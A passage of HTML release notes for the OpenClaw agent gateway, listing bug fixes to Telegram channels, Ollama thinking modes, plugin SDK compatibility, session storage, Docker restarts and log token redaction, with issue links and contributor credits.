<li>Gateway/media: route text-only <code>chat.send</code> image offloads through media-understanding fields so <code>agents.defaults.imageModel</code> can describe WebChat attachments instead of leaving only an opaque <code>media://inbound</code> marker. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337865362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72968/hovercard" href="https://github.com/openclaw/openclaw/issues/72968">#72968</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vorajeeah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vorajeeah">@vorajeeah</a>.</li>
<li>Gateway/Windows: route no-listener restart handoffs through the Windows supervisor without leaving restart tokens in flight, so failed task scheduling can be retried and successful handoffs do not coalesce later restart requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291628266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69056/hovercard" href="https://github.com/openclaw/openclaw/pull/69056">#69056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Thatgfsj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Thatgfsj">@Thatgfsj</a>.</li>
<li>Gateway/model pricing: skip plugin manifest discovery during background pricing refreshes when <code>plugins.enabled: false</code>, so disabled-plugin setups do not keep rebuilding plugin metadata from the Gateway hot path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340746488" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73291" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73291/hovercard" href="https://github.com/openclaw/openclaw/issues/73291">#73291</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slideshow-dingo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slideshow-dingo">@slideshow-dingo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fishgills/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fishgills">@fishgills</a>.</li>
<li>Ollama/thinking: validate <code>/think</code> commands against live Ollama catalog reasoning metadata and preserve explicit native <code>params.think</code>/<code>params.thinking</code>, so models whose <code>/api/show</code> capabilities include <code>thinking</code> expose <code>low</code>, <code>medium</code>, <code>high</code>, and <code>max</code> instead of being stuck on <code>off</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341296549" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73366/hovercard" href="https://github.com/openclaw/openclaw/issues/73366">#73366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cymise/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cymise">@cymise</a>.</li>
<li>Gateway/sessions: remove automatic oversized <code>sessions.json</code> rotation backups, deprecate <code>session.maintenance.rotateBytes</code>, and teach <code>openclaw doctor --fix</code> to remove the ignored key so hot session writes no longer copy multi-MB stores. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midhunmonachan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midhunmonachan">@midhunmonachan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Channels/Telegram: fail fast when Telegram rejects the startup <code>getMe</code> token probe with 401, so invalid or stale BotFather tokens are reported as token auth failures instead of misleading <code>deleteWebhook</code> cleanup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079390685" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47674" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47674/hovercard" href="https://github.com/openclaw/openclaw/issues/47674">#47674</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samaedan-arch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samaedan-arch">@samaedan-arch</a>.</li>
<li>ACPX: keep generated Codex and Claude ACP wrapper startup paths working when remote or special state filesystems reject chmod, since OpenClaw invokes the wrappers through Node instead of executing them directly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341024005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73333" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73333/hovercard" href="https://github.com/openclaw/openclaw/issues/73333">#73333</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/david-garcia-garcia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/david-garcia-garcia">@david-garcia-garcia</a>.</li>
<li>CLI/onboarding: infer image input for common custom-provider vision model IDs, ask only for unknown models, and keep <code>--custom-image-input</code>/<code>--custom-text-input</code> overrides so vision-capable proxies do not get saved as text-only configs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113799040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51869" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51869/hovercard" href="https://github.com/openclaw/openclaw/issues/51869">#51869</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antsoldier1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antsoldier1974">@Antsoldier1974</a>.</li>
<li>Models/OpenAI Codex: stop listing or resolving unsupported <code>openai-codex/gpt-5.4-mini</code> rows through Codex OAuth, keep stale discovery rows suppressed with a clear API-key-route hint, and leave direct <code>openai/gpt-5.4-mini</code> available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340500200" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73242" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73242/hovercard" href="https://github.com/openclaw/openclaw/issues/73242">#73242</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>.</li>
<li>Plugin SDK: restore the root <code>stringEnum</code> and <code>optionalStringEnum</code> exports on both the published SDK entry and runtime root-alias bridge, so older external plugins can keep building and loading while migrating to focused SDK subpaths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285319218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68279/hovercard" href="https://github.com/openclaw/openclaw/issues/68279">#68279</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marzliak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marzliak">@marzliak</a>.</li>
<li>Plugin SDK: restore the root-alias bridge for <code>registerContextEngine</code> and expose missing legacy compat helpers <code>normalizeAccountId</code> and <code>resolvePreferredOpenClawTmpDir</code> so older external plugins such as <code>openclaw-weixin</code> can keep loading while migrating to focused SDK subpaths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4125782136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53497" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53497/hovercard" href="https://github.com/openclaw/openclaw/issues/53497">#53497</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alanxchen85/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alanxchen85">@alanxchen85</a>.</li>
<li>Auth profiles: make <code>openclaw doctor --fix</code> migrate legacy flat <code>auth-profiles.json</code> files such as <code>{ "ollama-windows": { "apiKey": "ollama-local" } }</code> to canonical provider default API-key profiles with a backup, so custom Ollama/OpenAI-compatible providers recover cleanly after upgrading. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193723396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59629" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59629/hovercard" href="https://github.com/openclaw/openclaw/issues/59629">#59629</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193943109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59642" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59642/hovercard" href="https://github.com/openclaw/openclaw/pull/59642">#59642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xsanders555/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xsanders555">@Xsanders555</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Memory/Dreaming: retry Dream Diary once with the session default when a configured dreaming model is unavailable, while leaving subagent trust and allowlist errors visible instead of silently masking configuration problems. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4272034013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67409/hovercard" href="https://github.com/openclaw/openclaw/issues/67409">#67409</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293314377" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69209" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69209/hovercard" href="https://github.com/openclaw/openclaw/pull/69209">#69209</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ghiggins18/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ghiggins18">@Ghiggins18</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everySympathy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everySympathy">@everySympathy</a>.</li>
<li>Feishu/inbound files: recover CJK filenames from plain <code>Content-Disposition: filename=</code> download headers when Feishu exposes UTF-8 bytes through Latin-1 header decoding, while leaving valid Latin-1 and JSON-derived names unchanged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085480139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48578" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48578/hovercard" href="https://github.com/openclaw/openclaw/pull/48578">#48578</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4101571186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50435" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50435/hovercard" href="https://github.com/openclaw/openclaw/pull/50435">#50435</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191619007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59431/hovercard" href="https://github.com/openclaw/openclaw/pull/59431">#59431</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lishuaigit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lishuaigit">@lishuaigit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DoChaoing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DoChaoing">@DoChaoing</a>.</li>
<li>Channels/Telegram: normalize accidental full <code>/bot&lt;TOKEN&gt;</code> Telegram <code>apiRoot</code> values at runtime and teach <code>openclaw doctor --fix</code> to remove the suffix, so startup control calls no longer 404 when direct Bot API curl commands work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147583968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55387" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55387/hovercard" href="https://github.com/openclaw/openclaw/issues/55387">#55387</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brendanmatthewjones-cmyk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brendanmatthewjones-cmyk">@brendanmatthewjones-cmyk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/techfindubai-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/techfindubai-ux">@techfindubai-ux</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sivlerback-Chris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sivlerback-Chris">@Sivlerback-Chris</a>.</li>
<li>Zalo Personal: persist refreshed <code>zca-js</code> session cookies after QR login, session restore, and successful API calls so gateway restarts restore the freshest local session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340657088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73277" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73277/hovercard" href="https://github.com/openclaw/openclaw/pull/73277">#73277</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/darkamenosa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/darkamenosa">@darkamenosa</a>.</li>
<li>Logging/security: redact sensitive tokens (sk-* keys, Bearer/Authorization values, etc.) at the subsystem console sink so <code>createSubsystemLogger().info/warn/error</code> output that bypasses the patched console-capture handler still applies the same redaction the file transport already does. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340695876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73284/hovercard" href="https://github.com/openclaw/openclaw/issues/73284">#73284</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279976745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67953" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67953/hovercard" href="https://github.com/openclaw/openclaw/issues/67953">#67953</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236258393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64046" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64046/hovercard" href="https://github.com/openclaw/openclaw/issues/64046">#64046</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwin-rivera-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwin-rivera-dev">@edwin-rivera-dev</a>.</li>
<li>Plugins/runtime deps: reuse enclosing versioned cache roots when bundled plugins resolve from nested staged paths, so plugin-runtime-deps no longer mints <code>openclaw-unknown-*</code> directories or loops on <code>ENOTEMPTY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337695678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72956/hovercard" href="https://github.com/openclaw/openclaw/issues/72956">#72956</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340343701" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73205" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73205/hovercard" href="https://github.com/openclaw/openclaw/pull/73205">#73205</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Agents/failover: classify CJK provider transport, quota, billing, auth, and overload error text so Chinese-language provider failures trigger fallback and user-facing transport copy instead of surfacing as unclassified raw errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158199546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56242/hovercard" href="https://github.com/openclaw/openclaw/pull/56242">#56242</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomcatzh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomcatzh">@tomcatzh</a>.</li>
<li>Agents/failover: seed non-claude-cli fallback prompts with Claude Code session context when a claude-cli attempt fails, so fallback models do not restart cold after billing or quota failover. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330447925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72069" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72069/hovercard" href="https://github.com/openclaw/openclaw/pull/72069">#72069</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stainlu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stainlu">@stainlu</a>.</li>
<li>Agents/CLI runner: transfer bundle-MCP tempDir cleanup from the per-turn runner finally to the Claude live-session lifecycle, so persistent Claude CLI sessions keep their <code>--mcp-config</code> directory until the live subprocess closes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340502808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73244" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73244/hovercard" href="https://github.com/openclaw/openclaw/issues/73244">#73244</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwin-rivera-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwin-rivera-dev">@edwin-rivera-dev</a>.</li>
<li>Gateway/nodes: allow Windows companion nodes to use safe declared commands such as canvas, camera list, location, device info, and screen snapshot by default while keeping dangerous media commands opt-in. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329773477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71884" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71884/hovercard" href="https://github.com/openclaw/openclaw/pull/71884">#71884</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shanselman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shanselman">@shanselman</a>.</li>
<li>Agents/cron: clarify agent-tool and CLI cron timezone guidance so supplied <code>tz</code> values use local wall-clock cron fields and omitted cron <code>tz</code> falls back to the Gateway host local timezone. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4127561601" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53669" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53669/hovercard" href="https://github.com/openclaw/openclaw/issues/53669">#53669</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075848754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46177" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46177/hovercard" href="https://github.com/openclaw/openclaw/pull/46177">#46177</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341318988" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73372/hovercard" href="https://github.com/openclaw/openclaw/pull/73372">#73372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chen-zhang-cs-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chen-zhang-cs-code">@chen-zhang-cs-code</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maranello-o/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maranello-o">@maranello-o</a>.</li>
<li>Providers/Qwen: allow explicitly configured <code>qwen/qwen3.6-plus</code> to resolve on Qwen Coding Plan endpoints while keeping the built-in catalog from advertising it there. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230933224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63654" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63654/hovercard" href="https://github.com/openclaw/openclaw/issues/63654">#63654</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235706659" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63987" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63987/hovercard" href="https://github.com/openclaw/openclaw/pull/63987">#63987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepson-liu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepson-liu">@jepson-liu</a>.</li>
<li>Channels/Telegram: keep Bot API network fallbacks sticky after failed attempts and retry timed-out startup control calls once on the fallback route, so <code>deleteWebhook</code> IPv6 stalls no longer trigger slow multi-account retry storms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340559555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73255" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73255/hovercard" href="https://github.com/openclaw/openclaw/issues/73255">#73255</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sktbrd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sktbrd">@sktbrd</a>.</li>
<li>Gateway/agents: accept heartbeat, cron, and webhook as internal channel hints for agent runs so <code>sessions_spawn</code> works from non-delivery parent sessions while unknown channel hints still fail closed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340486669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73237" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73237/hovercard" href="https://github.com/openclaw/openclaw/issues/73237">#73237</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeWang0622/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeWang0622">@KeWang0622</a>.</li>
<li>Gateway/models: merge explicit <code>models.providers.*.models</code> rows into the Gateway model catalog with normalized provider/model dedupe, and use normalized image-capability lookup so custom vision models keep native image attachments even when Pi discovery omits them or model ID casing differs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237974987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64213" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64213/hovercard" href="https://github.com/openclaw/openclaw/issues/64213">#64213</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246490555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65165" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65165/hovercard" href="https://github.com/openclaw/openclaw/issues/65165">#65165</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/billonese/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/billonese">@billonese</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/202233a/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/202233a">@202233a</a>.</li>
<li>Gateway/reload: publish canonical post-write source config to in-process reloaders so simple config saves no longer create phantom plugin diffs or trigger unnecessary Gateway restarts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340625317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73267" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73267/hovercard" href="https://github.com/openclaw/openclaw/pull/73267">#73267</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/szsip239/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/szsip239">@szsip239</a>.</li>
<li>Gateway/Docker: keep config-triggered restarts in-process inside containers instead of spawning a detached child and exiting PID 1 cleanly, so Docker Swarm and other on-failure supervisors do not leave the service stuck at 0/1 replicas. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340175542" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73178/hovercard" href="https://github.com/openclaw/openclaw/issues/73178">#73178</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/du-nguyen-IT007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/du-nguyen-IT007">@du-nguyen-IT007</a>.</li>
<li>CLI/tasks: ship the task-registry control runtime in npm packages so <code>openclaw tasks cancel</code> can load ACP/subagent cancellation helpers from published builds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291247802" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68997" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68997/hovercard" href="https://github.com/openclaw/openclaw/issues/68997">#68997</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1OAKDesign/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1OAKDesign">@1OAKDesign</a>.</li>
<li>Channels/Telegram: preserve unsent generated media after partial reply streaming has already delivered the text, so <code>image_generate</code> outputs still reach Telegram as photos instead of being dropped from the final payload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340553289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73253" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73253/hovercard" href="https://github.com/openclaw/openclaw/issues/73253">#73253</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mlaihk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mlaihk">@mlaihk</a>.</li>
<li>Memory-core/dreaming: cap detached Dream Diary narrative subagents across cron sweeps so multi-workspace dreaming no longer fans out unbounded subagent sessions, lock contention, and cascading narrative timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340303806" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73198" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73198/hovercard" href="https://github.com/openclaw/openclaw/issues/73198">#73198</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340721230" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73287" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73287/hovercard" href="https://github.com/openclaw/openclaw/pull/73287">#73287</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeWang0622/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeWang0622">@KeWang0622</a>.</li>
<li>CLI/agents: close local one-shot Claude live stdio sessions and bundled MCP loopback resources after embedded <code>openclaw agent --local</code> runs, while keeping gateway-owned MCP loopback cleanup internal to the Gateway. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
